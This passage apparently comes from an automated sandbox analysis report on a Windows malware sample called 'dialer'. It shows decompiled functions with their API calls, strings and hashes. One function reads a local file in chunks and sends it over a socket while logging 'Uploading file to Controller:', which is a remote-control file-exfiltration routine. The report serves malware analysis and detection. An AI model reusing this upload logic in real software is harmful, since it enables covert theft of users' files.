				signed int _t282;
				void* _t283;
				void* _t284;
				void* _t285;
				signed int _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int* _t292;
				signed int _t298;
				signed int _t299;
				CHAR* _t300;
				signed int _t302;
				signed int _t303;
				WCHAR* _t304;
				signed int _t305;
				signed int _t306;
				signed int* _t307;
				signed int _t308;
				signed int _t310;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t320;
				void* _t321;
				void* _t322;
				void* _t323;

				_t217 = _a4;
				if(_t217 != 0) {
					_t286 = _t217;
					_t116 = E00434870(_t217, 0x3d);
					_v16 = _t116;
					_t231 = _t285;
					__eflags = _t116;
					if(_t116 == 0) {
						L10:
						 *((intOrPtr*)(L00439E14())) = 0x16;
						goto L11;
					} else {
						__eflags = _t116 - _t217;
						if(_t116 == _t217) {
							goto L10;
						} else {
							__eflags =  *((char*)(_t116 + 1));
							_t298 =  *0x46b4d0; // 0x2f997f0
							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
							_v5 = _t120;
							__eflags = _t298 -  *0x46b4dc; // 0x2f997f0
							if(__eflags == 0) {
								L87();
								_t298 = _t120;
								_t120 = _v5;
								_t231 = _t298;
								 *0x46b4d0 = _t298;
							}
							_t218 = 0;
							__eflags = _t298;
							if(_t298 != 0) {
								L21:
								_t233 = _t286;
								_t122 = _v16 - _t233;
								_push(_t122);
								_push(_t233);
								L121();
								_v12 = _t122;
								__eflags = _t122;
								if(_t122 < 0) {
									L29:
									__eflags = _v5 - _t218;
									if(_v5 != _t218) {
										goto L12;
									} else {
										_t123 =  ~_t122;
										_v12 = _t123;
										_t27 = _t123 + 2; // 0x2
										_t236 = _t27;
										__eflags = _t236 - _t123;
										if(_t236 < _t123) {
											goto L11;
										} else {
											__eflags = _t236 - 0x3fffffff;
											if(_t236 >= 0x3fffffff) {
												goto L11;
											} else {
												_push(4);
												_push(_t236);
												_t299 = E00446905(_t298);
												L0043EE85(_t218);
												_t320 = _t320 + 0x10;
												__eflags = _t299;
												if(_t299 == 0) {
													goto L11;
												} else {
													_t237 = _v12;
													_t286 = _t218;
													_t126 = _a4;
													 *(_t299 + _t237 * 4) = _t126;
													 *(_t299 + 4 + _t237 * 4) = _t218;
													goto L34;
												}
											}
										}
									}
								} else {
									__eflags =  *_t298 - _t218;
									if( *_t298 == _t218) {
										goto L29;
									} else {
										L0043EE85( *((intOrPtr*)(_t298 + _t122 * 4)));
										_t282 = _v12;
										__eflags = _v5 - _t218;
										if(_v5 != _t218) {
											while(1) {
												__eflags =  *(_t298 + _t282 * 4) - _t218;
												if( *(_t298 + _t282 * 4) == _t218) {
													break;
												}
												 *(_t298 + _t282 * 4) =  *(_t298 + 4 + _t282 * 4);
												_t282 = _t282 + 1;
												__eflags = _t282;
											}
											_push(4);
											_push(_t282);
											_t299 = E00446905(_t298);
											L0043EE85(_t218);
											_t320 = _t320 + 0x10;
											_t126 = _t286;
											__eflags = _t299;
											if(_t299 != 0) {
												L34:
												 *0x46b4d0 = _t299;
											}
										} else {
											_t126 = _a4;
											_t286 = _t218;
											 *(_t298 + _t282 * 4) = _t126;
										}
										__eflags = _a8 - _t218;
										if(_a8 == _t218) {
											goto L12;
										} else {
											_t238 = _t126;
											_t283 = _t238 + 1;
											do {
												_t127 =  *_t238;
												_t238 = _t238 + 1;
												__eflags = _t127;
											} while (_t127 != 0);
											_v12 = _t238 - _t283 + 2;
											_t300 = E0043DFD9(_t238 - _t283, _t238 - _t283 + 2, 1);
											_pop(_t241);
											__eflags = _t300;
											if(_t300 == 0) {
												L42:
												L0043EE85(_t300);
												goto L12;
											} else {
												_t131 = E004405A6(_t300, _v12, _a4);
												_t321 = _t320 + 0xc;
												__eflags = _t131;
												if(_t131 != 0) {
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													E0043629A();
													asm("int3");
													_t316 = _t321;
													_t322 = _t321 - 0xc;
													_push(_t218);
													_t220 = _v44;
													__eflags = _t220;
													if(_t220 != 0) {
														_push(_t300);
														_push(_t286);
														_push(0x3d);
														_t288 = _t220;
														_t133 = E00450867(_t241);
														_v20 = _t133;
														_t244 = _t220;
														__eflags = _t133;
														if(_t133 == 0) {
															L54:
															 *((intOrPtr*)(L00439E14())) = 0x16;
															goto L55;
														} else {
															__eflags = _t133 - _t220;
															if(_t133 == _t220) {
																goto L54;
															} else {
																_t302 =  *0x46b4d4; // 0x0
																_t221 = 0;
																__eflags =  *(_t133 + 2);
																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
																_v9 = _t246;
																__eflags = _t302 -  *0x46b4d8; // 0x0
																if(__eflags == 0) {
																	_push(_t302);
																	L104();
																	_t246 = _v9;
																	_t302 = _t133;
																	 *0x46b4d4 = _t302;
																}
																__eflags = _t302;
																if(_t302 != 0) {
																	L64:
																	_v20 = _v20 - _t288 >> 1;
																	_t138 = E00446898(_t288, _v20 - _t288 >> 1);
																	_v16 = _t138;
																	__eflags = _t138;
																	if(_t138 < 0) {
																		L72:
																		__eflags = _v9 - _t221;
																		if(_v9 != _t221) {
																			goto L56;
																		} else {
																			_t139 =  ~_t138;
																			_v16 = _t139;
																			_t72 = _t139 + 2; // 0x2
																			_t252 = _t72;
																			__eflags = _t252 - _t139;
																			if(_t252 < _t139) {
																				goto L55;
																			} else {
																				__eflags = _t252 - 0x3fffffff;
																				if(_t252 >= 0x3fffffff) {
																					goto L55;
																				} else {
																					_push(4);
																					_push(_t252);
																					_t303 = E00446905(_t302);
																					L0043EE85(_t221);
																					_t322 = _t322 + 0x10;
																					__eflags = _t303;
																					if(_t303 == 0) {
																						goto L55;
																					} else {
																						_t253 = _v16;
																						_t288 = _t221;
																						_t142 = _v0;
																						 *(_t303 + _t253 * 4) = _t142;
																						 *(_t303 + 4 + _t253 * 4) = _t221;
																						goto L77;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *_t302 - _t221;
																		if( *_t302 == _t221) {
																			goto L72;
																		} else {
																			L0043EE85( *((intOrPtr*)(_t302 + _t138 * 4)));
																			_t276 = _v16;
																			__eflags = _v9 - _t221;
																			if(_v9 != _t221) {
																				while(1) {
																					__eflags =  *(_t302 + _t276 * 4) - _t221;
																					if( *(_t302 + _t276 * 4) == _t221) {
																						break;
																					}
																					 *(_t302 + _t276 * 4) =  *(_t302 + 4 + _t276 * 4);
																					_t276 = _t276 + 1;
																					__eflags = _t276;
																				}
																				_push(4);
																				_push(_t276);
																				_t303 = E00446905(_t302);
																				L0043EE85(_t221);
																				_t322 = _t322 + 0x10;
																				_t142 = _t288;
																				__eflags = _t303;
																				if(_t303 != 0) {
																					L77:
																					 *0x46b4d4 = _t303;
																				}
																			} else {
																				_t142 = _v0;
																				_t288 = _t221;
																				 *(_t302 + _t276 * 4) = _t142;
																			}
																			__eflags = _a4 - _t221;
																			if(_a4 == _t221) {
																				goto L56;
																			} else {
																				_t254 = _t142;
																				_t81 = _t254 + 2; // 0x2
																				_t284 = _t81;
																				do {
																					_t143 =  *_t254;
																					_t254 = _t254 + 2;
																					__eflags = _t143 - _t221;
																				} while (_t143 != _t221);
																				_t82 = (_t254 - _t284 >> 1) + 2; // 0x0
																				_v16 = _t82;
																				_t304 = E0043DFD9(_t254 - _t284 >> 1, _t82, 2);
																				_pop(_t258);
																				__eflags = _t304;
																				if(_t304 == 0) {
																					L85:
																					L0043EE85(_t304);
																					goto L56;
																				} else {
																					_t148 = E00440264(_t304, _v16, _v0);
																					_t323 = _t322 + 0xc;
																					__eflags = _t148;
																					if(_t148 != 0) {
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						E0043629A();
																						asm("int3");
																						_push(_t316);
																						_t317 = _t323;
																						_push(_t288);
																						_t290 = _v92;
																						__eflags = _t290;
																						if(_t290 != 0) {
																							_t260 = 0;
																							_t150 = _t290;
																							__eflags =  *_t290;
																							if( *_t290 != 0) {
																								do {
																									_t150 =  &(_t150[1]);
																									_t260 = _t260 + 1;
																									__eflags =  *_t150;
																								} while ( *_t150 != 0);
																							}
																							_t93 = _t260 + 1; // 0x2
																							_t305 = E0043DFD9(_t260, _t93, 4);
																							_t262 = _t304;
																							__eflags = _t305;
																							if(_t305 == 0) {
																								L102:
																								E0043E5DA(_t221, _t284, _t290, _t305);
																								goto L103;
																							} else {
																								__eflags =  *_t290;
																								if( *_t290 == 0) {
																									L100:
																									L0043EE85(0);
																									_t175 = _t305;
																									goto L101;
																								} else {
																									_push(_t221);
																									_t221 = _t305 - _t290;
																									__eflags = _t221;
																									do {
																										_t271 =  *_t290;
																										_t94 = _t271 + 1; // 0x5
																										_t284 = _t94;
																										do {
																											_t176 =  *_t271;
																											_t271 = _t271 + 1;
																											__eflags = _t176;
																										} while (_t176 != 0);
																										_t262 = _t271 - _t284;
																										_t95 = _t262 + 1; // 0x6
																										_v16 = _t95;
																										 *(_t221 + _t290) = E0043DFD9(_t262, _t95, 1);
																										L0043EE85(0);
																										_t323 = _t323 + 0xc;
																										__eflags =  *(_t221 + _t290);
																										if( *(_t221 + _t290) == 0) {
																											goto L102;
																										} else {
																											_t180 = E004405A6( *(_t221 + _t290), _v16,  *_t290);
																											_t323 = _t323 + 0xc;
																											__eflags = _t180;
																											if(_t180 != 0) {
																												L103:
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												_push(0);
																												E0043629A();
																												asm("int3");
																												_push(_t317);
																												_t318 = _t323;
																												_push(_t262);
																												_push(_t262);
																												_push(_t290);
																												_t291 = _v128;
																												__eflags = _t291;
																												if(_t291 != 0) {
																													_push(_t221);
																													_t223 = 0;
																													_t156 = _t291;
																													_t263 = 0;
																													_v20 = 0;
																													_push(_t305);
																													__eflags =  *_t291;
																													if( *_t291 != 0) {
																														do {
																															_t156 =  &(_t156[1]);
																															_t263 = _t263 + 1;
																															__eflags =  *_t156;
																														} while ( *_t156 != 0);
																													}
																													_t104 = _t263 + 1; // 0x2
																													_t306 = E0043DFD9(_t263, _t104, 4);
																													__eflags = _t306;
																													if(_t306 == 0) {
																														L119:
																														E0043E5DA(_t223, _t284, _t291, _t306);
																														goto L120;
																													} else {
																														__eflags =  *_t291 - _t223;
																														if( *_t291 == _t223) {
																															L117:
																															L0043EE85(_t223);
																															_t167 = _t306;
																															goto L118;
																														} else {
																															_t223 = _t306 - _t291;
																															__eflags = _t223;
																															do {
																																_t267 =  *_t291;
																																_t105 = _t267 + 2; // 0x6
																																_t284 = _t105;
																																do {
																																	_t168 =  *_t267;
																																	_t267 = _t267 + 2;
																																	__eflags = _t168 - _v20;
																																} while (_t168 != _v20);
																																_t107 = (_t267 - _t284 >> 1) + 1; // 0x3
																																_v24 = _t107;
																																 *(_t223 + _t291) = E0043DFD9(_t267 - _t284 >> 1, _t107, 2);
																																L0043EE85(0);
																																_t323 = _t323 + 0xc;
																																__eflags =  *(_t223 + _t291);
																																if( *(_t223 + _t291) == 0) {
																																	goto L119;
																																} else {
																																	_t173 = E00440264( *(_t223 + _t291), _v24,  *_t291);
																																	_t323 = _t323 + 0xc;
																																	__eflags = _t173;
																																	if(_t173 != 0) {
																																		L120:
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		_push(0);
																																		E0043629A();
																																		asm("int3");
																																		_push(_t318);
																																		_push(_t223);
																																		_push(_t306);
																																		_push(_t291);
																																		_t292 =  *0x46b4d0; // 0x2f997f0
																																		_t307 = _t292;
																																		__eflags =  *_t292;
																																		if( *_t292 == 0) {
																																			L127:
																																			_t308 = _t307 - _t292;
																																			__eflags = _t308;
																																			_t310 =  ~(_t308 >> 2);
																																		} else {
																																			_t225 = _v8;
																																			do {
																																				_t163 = E00443141(_v12,  *_t307, _t225);
																																				_t323 = _t323 + 0xc;
																																				__eflags = _t163;
																																				if(_t163 != 0) {
																																					goto L126;
																																				} else {
																																					_t165 =  *((intOrPtr*)(_t225 +  *_t307));
																																					__eflags = _t165 - 0x3d;
																																					if(_t165 == 0x3d) {
																																						L129:
																																						_t310 = _t307 - _t292 >> 2;
																																					} else {
																																						__eflags = _t165;
																																						if(_t165 == 0) {
																																							goto L129;
																																						} else {
																																							goto L126;
																																						}
																																					}
																																				}
																																				goto L128;
																																				L126:
																																				_t307 =  &(_t307[1]);
																																				__eflags =  *_t307;
																																			} while ( *_t307 != 0);
																																			goto L127;
																																		}
																																		L128:
																																		return _t310;
																																	} else {
																																		goto L115;
																																	}
																																}
																																goto L130;
																																L115:
																																_t291 = _t291 + 4;
																																__eflags =  *_t291 - _t173;
																															} while ( *_t291 != _t173);
																															_t223 = 0;
																															__eflags = 0;
																															goto L117;
																														}
																													}
																												} else {
																													_t167 = 0;
																													L118:
																													return _t167;
																												}
																											} else {
																												goto L98;
																											}
																										}
																										goto L130;
																										L98:
																										_t290 = _t290 + 4;
																										__eflags =  *_t290 - _t180;
																									} while ( *_t290 != _t180);
																									goto L100;
																								}
																							}
																						} else {
																							_t175 = 0;
																							L101:
																							return _t175;
																						}
																					} else {
																						_t274 =  &(_t304[_v20 + 1]);
																						 *(_t274 - 2) = _t148;
																						asm("sbb eax, eax");
																						_t185 = SetEnvironmentVariableW(_t304,  !( ~(_v9 & 0x000000ff)) & _t274);
																						__eflags = _t185;
																						if(_t185 == 0) {
																							_t186 = L00439E14();
																							_t221 = _t221 | 0xffffffff;
																							__eflags = _t221;
																							 *_t186 = 0x2a;
																						}
																						goto L85;
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t191 =  *0x46b4d0; // 0x2f997f0
																	__eflags = _a4 - _t221;
																	if(_a4 == _t221) {
																		L58:
																		__eflags = _t246;
																		if(_t246 != 0) {
																			goto L56;
																		} else {
																			__eflags = _t191;
																			if(_t191 != 0) {
																				L62:
																				 *0x46b4d4 = E0043DFD9(_t246, 1, 4);
																				L0043EE85(_t221);
																				_t322 = _t322 + 0xc;
																				goto L63;
																			} else {
																				 *0x46b4d0 = E0043DFD9(_t246, 1, 4);
																				L0043EE85(_t221);
																				_t322 = _t322 + 0xc;
																				__eflags =  *0x46b4d0 - _t221; // 0x2f997f0
																				if(__eflags == 0) {
																					goto L55;
																				} else {
																					_t302 =  *0x46b4d4; // 0x0
																					__eflags = _t302;
																					if(_t302 != 0) {
																						goto L64;
																					} else {
																						goto L62;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags = _t191;
																		if(_t191 == 0) {
																			goto L58;
																		} else {
																			_t196 = L0043C07A(_t221);
																			__eflags = _t196;
																			if(_t196 != 0) {
																				L63:
																				_t302 =  *0x46b4d4; // 0x0
																				__eflags = _t302;
																				if(_t302 == 0) {
																					L55:
																					_t221 = _t220 | 0xffffffff;
																					__eflags = _t221;
																					L56:
																					L0043EE85(_t288);
																					_t136 = _t221;
																					goto L57;
																				} else {
																					goto L64;
																				}
																			} else {
																				goto L54;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t197 = L00439E14();
														 *_t197 = 0x16;
														_t136 = _t197 | 0xffffffff;
														L57:
														return _t136;
													}
												} else {
													_t280 = _v16 + 1 + _t300 - _a4;
													asm("sbb eax, eax");
													 *(_t280 - 1) = _t218;
													_t204 = SetEnvironmentVariableA(_t300,  !( ~(_v5 & 0x000000ff)) & _t280);
													__eflags = _t204;
													if(_t204 == 0) {
														_t205 = L00439E14();
														_t218 = _t218 | 0xffffffff;
														__eflags = _t218;
														 *_t205 = 0x2a;
													}
													goto L42;
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L14:
									__eflags = _t120;
									if(_t120 == 0) {
										 *0x46b4d0 = E0043DFD9(_t231, 1, 4);
										L0043EE85(_t218);
										_t298 =  *0x46b4d0; // 0x2f997f0
										_t320 = _t320 + 0xc;
										__eflags = _t298;
										if(_t298 == 0) {
											goto L11;
										} else {
											__eflags =  *0x46b4d4 - _t218; // 0x0
											if(__eflags != 0) {
												goto L20;
											} else {
												 *0x46b4d4 = E0043DFD9(_t231, 1, 4);
												L0043EE85(_t218);
												_t320 = _t320 + 0xc;
												__eflags =  *0x46b4d4 - _t218; // 0x0
												if(__eflags == 0) {
													goto L11;
												} else {
													goto L19;
												}
											}
										}
									} else {
										_t218 = 0;
										goto L12;
									}
								} else {
									__eflags =  *0x46b4d4 - _t218; // 0x0
									if(__eflags == 0) {
										goto L14;
									} else {
										_t214 = L0043C075(0);
										__eflags = _t214;
										if(_t214 != 0) {
											L19:
											_t298 =  *0x46b4d0; // 0x2f997f0
											L20:
											__eflags = _t298;
											if(_t298 == 0) {
												L11:
												_t218 = _t217 | 0xffffffff;
												__eflags = _t218;
												L12:
												L0043EE85(_t286);
												_t119 = _t218;
												goto L13;
											} else {
												goto L21;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				} else {
					_t215 = L00439E14();
					 *_t215 = 0x16;
					_t119 = _t215 | 0xffffffff;
					L13:
					return _t119;
				}
				L130:
			}

APIs

___from_strstr_to_strchr.LIBCMT ref: 00446284
_free.LIBCMT ref: 004462EF
_free.LIBCMT ref: 00446315
_free.LIBCMT ref: 0044633E
_free.LIBCMT ref: 00446376
_free.LIBCMT ref: 004463A7
_free.LIBCMT ref: 004463E8
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 00446469
_free.LIBCMT ref: 00446482
_wcschr.LIBVCRUNTIME ref: 004464BF
_free.LIBCMT ref: 0044652B
_free.LIBCMT ref: 00446551
_free.LIBCMT ref: 0044657A
_free.LIBCMT ref: 004465AF
_free.LIBCMT ref: 004465E0
_free.LIBCMT ref: 00446621
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004466A6
_free.LIBCMT ref: 004466BF

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
String ID:
API String ID: 2719235668-0
Opcode ID: b2dec079ddc28030332d1a642ba15c6d907e7ea48ffdc28aa5a9fd2a8908e3bc
Instruction ID: b3a0fccac4172db87641eb1f9af5537d347888dfd9dcec10cf93ff69a179e89b
Opcode Fuzzy Hash: b2dec079ddc28030332d1a642ba15c6d907e7ea48ffdc28aa5a9fd2a8908e3bc
Instruction Fuzzy Hash: 17D127719003007BFB20AF75984266B7BA4EF07718F06016FE945D7382EB799901CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 00406455, Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 345
fileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00406455(intOrPtr __ecx, void* __edx, WCHAR* _a4, char _a8, char _a32, char _a56) {
				void* _v12;
				union _LARGE_INTEGER _v16;
				struct _OVERLAPPED* _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				long _v36;
				struct _OVERLAPPED* _v40;
				union _LARGE_INTEGER* _v44;
				signed int _v48;
				signed int _v52;
				struct %anon52 _v64;
				intOrPtr _v68;
				struct %anon52 _v80;
				union _LARGE_INTEGER _v84;
				intOrPtr _v88;
				char _v112;
				char _v136;
				char _v160;
				char _v184;
				char _v208;
				char _v232;
				char _v256;
				char _v280;
				char _v304;
				char _v328;
				char _v352;
				char _v376;
				char _v400;
				char _v424;
				char _v448;
				char _v472;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct %anon52 _t117;
				void* _t119;
				void* _t126;
				long _t136;
				void* _t137;
				signed int _t138;
				struct _OVERLAPPED* _t145;
				signed int _t148;
				void* _t154;
				void* _t156;
				void* _t157;
				void* _t173;
				long _t198;
				signed int _t203;
				void* _t216;
				union _LARGE_INTEGER _t280;
				intOrPtr _t281;
				union _LARGE_INTEGER* _t295;
				void* _t297;
				void* _t301;
				void* _t302;
				void* _t303;
				void* _t304;
				void* _t305;

				_t278 = __edx;
				_v68 = __ecx;
				E00404955(__ecx);
				_t302 = _t301 - 0x10;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t299 = _v68;
				E004049D2(__edx);
				_v28 = 0x186a0;
				_v20 = 0;
				_t297 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				_t310 = _t297 - 0xffffffff;
				if(_t297 != 0xffffffff) {
					_v80.LowPart = 0;
					_v80.HighPart = 0;
					__imp__GetFileSizeEx(_t297,  &_v80);
					_t203 = _v80.HighPart;
					_t117 = _v80;
					_v48 = _t203;
					_v32 = _t203;
					_v52 = _t117;
					_v16.LowPart = _t117;
					E0040425F(0,  &_v112, _a4);
					_t119 = E00416C93( &_v136,  &_v112);
					_t303 = _t302 - 0x18;
					_t280 = "Uploading file to Controller: ";
					E004075C4(0, _t303, _t280, _t297, __eflags, _t119);
					_t304 = _t303 - 0x14;
					E00402064(0, _t304, "[Info]");
					E004165D8(0, _t297);
					_t305 = _t304 + 0x30;
					L00401FA7();
					L00401ED0();
					_v36 = 1;
					_v40 = 0;
					_t126 = E004500F0(_v52, _v48, 0x186a0, 0);
					_t210 = _t280;
					asm("xorps xmm0, xmm0");
					_v88 = _t126 + 1;
					asm("adc ecx, ebx");
					asm("movlpd [ebp-0x3c], xmm0");
					_v84.LowPart = _t280;
					__eflags = _v48;
					if(__eflags < 0) {
						L17:
						CloseHandle(_t297);
						L00404DD5(_t299);
						_t198 = 1;
					} else {
						if(__eflags > 0) {
							L5:
							_v44 = _v64.HighPart.LowPart;
							_v64.HighPart.LowPart = _v64;
							_t136 = 0x186a0;
							goto L6;
							do {
								do {
									L6:
									_t281 = _v32;
									__eflags = _v20 - _t281;
									if(__eflags >= 0) {
										_t210 = _v16.LowPart;
										if(__eflags > 0) {
											L9:
											_t136 = _t210;
											_v20 = _t281;
											_v28 = _t136;
										} else {
											__eflags = _t136 - _t210;
											if(__eflags > 0) {
												goto L9;
											}
										}
									}
									_push(_t136);
									_t137 = L0042EE1E(_t210, _t281, _t299, __eflags);
									_push(0);
									_v12 = _t137;
									_v24 = 0;
									_t138 = SetFilePointerEx(_t297, _v64.HighPart.LowPart, _v44, 0);
									__eflags = _t138;
									if(_t138 == 0) {
										_t306 = _t305 - 0x18;
										_t216 = _t305 - 0x18;
										_push("SetFilePointerEx error");
										goto L23;
									} else {
										_t148 = ReadFile(_t297, _v12, _v28,  &_v24, 0);
										__eflags = _t148;
										if(_t148 == 0) {
											_t306 = _t305 - 0x18;
											_t216 = _t305 - 0x18;
											_push("ReadFile error");
											L23:
											E00402064(0, _t216);
											E00402064(0, _t306 - 0x18, "[ERROR]");
											E004165D8(0, _t297);
											L0042EE27(_v12);
											CloseHandle(_t297);
											goto L24;
										} else {
											__eflags = _v24;
											if(__eflags == 0) {
												L0042EE27(_v12);
												CloseHandle(_t297);
												L00404DD5(_t299);
												_t145 = 1;
												goto L25;
											} else {
												E0040425F(0,  &_v112, _a4);
												_t154 = E0040208B(0,  &_v472, _t281, __eflags, _v12, _v24);
												_t305 = _t305 - 0x18;
												_t156 = E00416BB8(0x46c238,  &_v448, _v88, _v84);
												_t157 = E00416BB8(0x46c238,  &_v424, _v36, _v40);
												L00402EFD(_t305, L00402F73(0x46c238,  &_v136, L00402F73(0x46c238,  &_v160, L00402F73(0x46c238,  &_v184, L00402EFD( &_v208, L00402F73(0x46c238,  &_v232, L00402EFD( &_v256, L00402F73(0x46c238,  &_v280, L00402F73(0x46c238,  &_v304, L00402F73(0x46c238,  &_v328, L00402F73(0x46c238,  &_v352, L00402F73(0x46c238,  &_v376, E00416CF4(0x46c238,  &_v400,  &_v112), __eflags, 0x46c238), __eflags,  &_a8), __eflags, 0x46c238), __eflags,  &_a32), __eflags, 0x46c238), _t157), __eflags, 0x46c238), _t156), __eflags, 0x46c238), __eflags,  &_a56), __eflags, 0x46c238), _t154);
												_t299 = _v68;
												_push(0x52);
												_t173 = E00404A6E(0x46c238, _v68, _t171, __eflags);
												__eflags = _t173 - 0xffffffff;
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401FA7();
												L00401ED0();
												__eflags = 0x46c200 | _t173 == 0xffffffff;
												if((0x46c200 | _t173 == 0xffffffff) != 0) {
													L00404DD5(_t299);
													CloseHandle(_t297);
													L0042EE27(_v12);
													_t198 = 0;
												} else {
													goto L14;
												}
											}
										}
									}
									goto L18;
									L14:
									L0042EE27(_v12);
									_t136 = _v28;
									_v16.LowPart = _v16 - _t136;
									_t295 = _v44;
									asm("sbb ecx, [ebp-0x10]");
									_v36 = _v36 + 1;
									_push(0);
									_pop(0);
									asm("adc [ebp-0x24], ebx");
									_t210 = _v64.HighPart.LowPart + _t136;
									_v64.HighPart = _t210;
									asm("adc edx, [ebp-0x10]");
									_v44 = _t295;
									__eflags = _t295 - _v48;
								} while (__eflags < 0);
								if(__eflags > 0) {
									goto L17;
								} else {
									goto L16;
								}
								goto L18;
								L16:
								__eflags = _t210 - _v52;
							} while (_t210 < _v52);
							goto L17;
						} else {
							__eflags = _v52;
							if(_v52 <= 0) {
								goto L17;
							} else {
								goto L5;
							}
						}
					}
				} else {
					E004020CC(0, _t302 - 0x18, _t278, _t310,  &_a8);
					_push(0x53);
					E00404A6E(0, 0x46c2e8, _t278, _t310);
					L24:
					L00404DD5(_t299);
					_t145 = 0;
					L25:
					_t198 = _t145;
				}
				L18:
				L00401FA7();
				L00401FA7();
				L00401FA7();
				return _t198;
			}

APIs

Part of subcall function 004049D2: connect.WS2_32(?,0046DB88,00000010), ref: 004049ED

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004064A0
GetFileSizeEx.KERNEL32(00000000,?), ref: 004064D7
__aulldiv.LIBCMT ref: 00406559
SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,000186A0,00000000), ref: 004065C7
ReadFile.KERNEL32(00000000,?,000186A0,?,00000000), ref: 004065E2

Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2

Part of subcall function 00404DD5: closesocket.WS2_32(?), ref: 00404DDB

Strings

ReadFile error, xrefs: 00406886
[ERROR], xrefs: 004068A1
[Info], xrefs: 0040651D
SetFilePointerEx error, xrefs: 00406892
Uploading file to Controller: , xrefs: 0040650B

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: File$CreatePointerReadSize__aulldivclosesocketconnectsend
String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $[ERROR]$[Info]
API String ID: 1319223106-2190262076
Opcode ID: 5a23789908aa5a281926455435f61879a48f65eda8f6a275c427b5af12834781
Instruction ID: 084dee6794f9bc5a8996b457c444aa73e5b6539c698c474e9a2b46c6d08c787a
Opcode Fuzzy Hash: 5a23789908aa5a281926455435f61879a48f65eda8f6a275c427b5af12834781
Instruction Fuzzy Hash: 9AC16871E00219ABCB04FF65DC829EEB775AF44304F5081BFE406B6291EF385A458B99

Uniqueness

Uniqueness Score: -1.00%

Function 004187B2, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E004187B2(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct tagPOINT _v12;
				void* _t16;
				struct HMENU__* _t17;
				void* _t20;
				void* _t24;

				_t16 = _a8 - 1;
				if(_t16 == 0) {
					_t17 = CreatePopupMenu();
					 *0x46beb8 = _t17;
					AppendMenuA(_t17, 0, 0, "Close");
					L15:
					return 0;
				}
				_t20 = _t16 - 0x110;
				if(_t20 == 0) {
					if(_a12 != 0) {
						goto L15;
					}
					Shell_NotifyIconA(2, 0x46bec0);
					ExitProcess(0);
				}
				if(_t20 == 0x2f0) {
					_t24 = _a16 - 0x201;
					if(_t24 == 0) {
						if(IsWindowVisible( *0x46bebc) == 0) {
							ShowWindow( *0x46bebc, 9);
							SetForegroundWindow( *0x46bebc);
						} else {
							ShowWindow( *0x46bebc, 0);
						}
						goto L15;
					}
					if(_t24 == 3) {
						GetCursorPos( &_v12);
						SetForegroundWindow(_a4);
						TrackPopupMenu( *0x46beb8, 0, _v12, _v12.y, 0, _a4, 0);
						goto L15;
					}
					_push(_a16);
					_push(_a12);
					_push(0x401);
					L7:
					return DefWindowProcA(_a4, ??, ??, ??);
				}
				_push(_a16);
				_push(_a12);
				_push(_a8);
				goto L7;
			}

APIs

DefWindowProcA.USER32(?,00000401,?,?), ref: 004187FD
GetCursorPos.USER32(?), ref: 0041880C
SetForegroundWindow.USER32(?), ref: 00418815
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041882F
Shell_NotifyIconA.SHELL32(00000002,0046BEC0), ref: 00418880
ExitProcess.KERNEL32 ref: 00418888
CreatePopupMenu.USER32 ref: 0041888E
AppendMenuA.USER32 ref: 004188A3

Strings

Close, xrefs: 00418894

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

